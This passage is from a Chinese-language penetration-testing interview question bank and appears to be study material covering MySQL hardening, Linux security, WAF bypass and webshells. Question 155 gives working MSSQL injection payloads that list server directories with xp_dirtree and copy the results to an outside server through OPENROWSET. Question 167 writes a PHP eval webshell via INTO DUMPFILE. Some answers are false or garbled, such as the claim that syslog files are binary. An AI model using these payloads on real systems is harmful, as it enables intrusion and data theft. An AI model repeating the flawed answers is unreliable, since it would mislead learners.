154.mysql 安全要如何做?
Mysql 账户权限安全
第 61 页 共 152 页 Mysql 数据的网络安全配置
密码策略安全
Mysql 日志
Mysql 数据库服务所在主机安全配置部署 SQL 注入检测、防御模块
mysqld 安全相关启动选项
mysql 备份策略
155.sqlserver public 权限要如何提权?
注入点执行
aaa.com x.asp?id=123;create table %23%23dhtemq (list int not null
identity (1,1), dirtree nvarchar(500),num1 nvarchar(500),num2
nvarchar(500))
注入点执行
aaa.com x.asp?id=123;insert into %23%23dhtemq(dirtree,num1,num2)
exec master.dbo.xp_dirtree [d:/] ,1,1;--
注入点执行
aaa.com x.asp?id=123;insert into OPENROWSET
('sqloledb','server=xx.xx.xx.xx,1433;Initial
Catalog=master;uid=sa;pwd=woshinidie','select dirtree,num1,num2
from dhtemq') select dirtree,num1,num2 from ##dhtemqxx.xx.xx.xx 执行
select * from dhtemq
--建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表
#-----为本地临时表
##----为全局临时表
create table ##nonamed(
dir ntext,
num int
)
--调用存储过程把执行回来的数据存到临时表里面
insert ##nonamed execute master..xp_dirtree 'c:/',1
第 62 页 共 152 页 --然后采用 openrowset 函数把临时表的数据导到本地 MSSQL 的 dirtree
表里面了
insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select *
from Northwind.dbo.dirtree') select * from ##nonamed
以上方法,也就是说 public 可以遍历用户服务器的目录
在 NBSI 中,只要把临时表名加前加##就可以了,但要注意 URL 转码,即
写成:%23%23nonamed 就 OK 了!
156.简述 Linux 系统安全加固需要做哪些方面?
1.密码安全策略
2.关闭不必要的端口和服务
3.文件权限的设置等
157.你使用什么工具来判断系统是否存在后门?
pchunter 攻击查看进程和服务
160.Linux 的 Selinux 是什么?如何设置 Selinux?
SELinux 是一种安全子系统,它能控制程序只能访问特定文件
使用 setup 工具进入图形化关闭搜索或者修改/etc/sysconfig/selinux 文件
SELINUX=disabled
防火墙打开使用 service iptables start 或则/etc/init.d/iptables start
161.iptables 工作在 TCP/IP 模型中的哪层?
网络层
162.syslog 里面都有哪些日志?安装软件的日志去哪找?
如何查询 ssh 的登录日志?
cd /var/log
less secure
163.syslog 可不可以使用 vi 等工具直接查看?是二进制文件吗?
不能,只能使用 cat 之类的命令攻击查看,属于二进制文件
第 63 页 共 152 页 164.DNS 在渗透中的作用?
通过 DNS 可以查询对应的 IP 主机名,也可以查询出是否存在域传输漏洞
165、为什么 aspx 木马权限比 asp 大?
aspx 使用的是.net 技术。IIS 中默认不支持,ASP 只是脚本语言而已。入侵的时候 asp 的
木马一般是 guest
权限...APSX 的木马一般是 users 权限。
166.如何绕过 waf?
大小写转换法
干扰字符 /!/
编码 base64 unicode hex url ascll
复参数
167.如何向服务器写入 webshell?
各种上传漏洞
mysql 具有写入权限,用 sql 语句写入 shell:
select '一句话' into outfile '路径'
select '一句话' into dumpfile '路径'
select ' <?php eval($_POST[1]) ?> ' into dumpfile '路劲.muma.php';
http put 方法
168、了解编辑器漏洞吗?
其实还是文件上传漏洞
1- FCKeditor 编辑器
2- EWEbeditor 编辑器
3- DotNetTextBox 编辑器
4- Kedit 编辑器
5- Cute Editor 在线编辑器
#这个问题基本回答个两三个就可以
169、文件包含都有哪些伪协议?
第 64 页 共 152 页 file:// 访问本地文件系统
http:// 访问 HTTPs 网址
ftp:// 访问 ftp URL
Php:// 访问输入输出流
Zlib:// 压缩流
Data:// 数据
Ssh2:// security shell2
Expect:// 处理交互式的流
Glob:// 查找匹配的文件路径
170、正向 shell 与反向 shell 的区别
正向 Shell:攻击者连接被攻击者机器,可用于攻击者处于内网,被攻击者处于公网的情况。
反向 Shell:被攻击者主动连接攻击者,可用于攻击者处于外网,被攻击者处于内网的情况。
正向代理即是客户端代理,
代理客户端,
服务端不知道实际发起请求的客 户端.
反向代理即是服务端代理,
代理服务端,
客户端不知道实际提供服务的服 务端
面试问题大汇总
常规性问题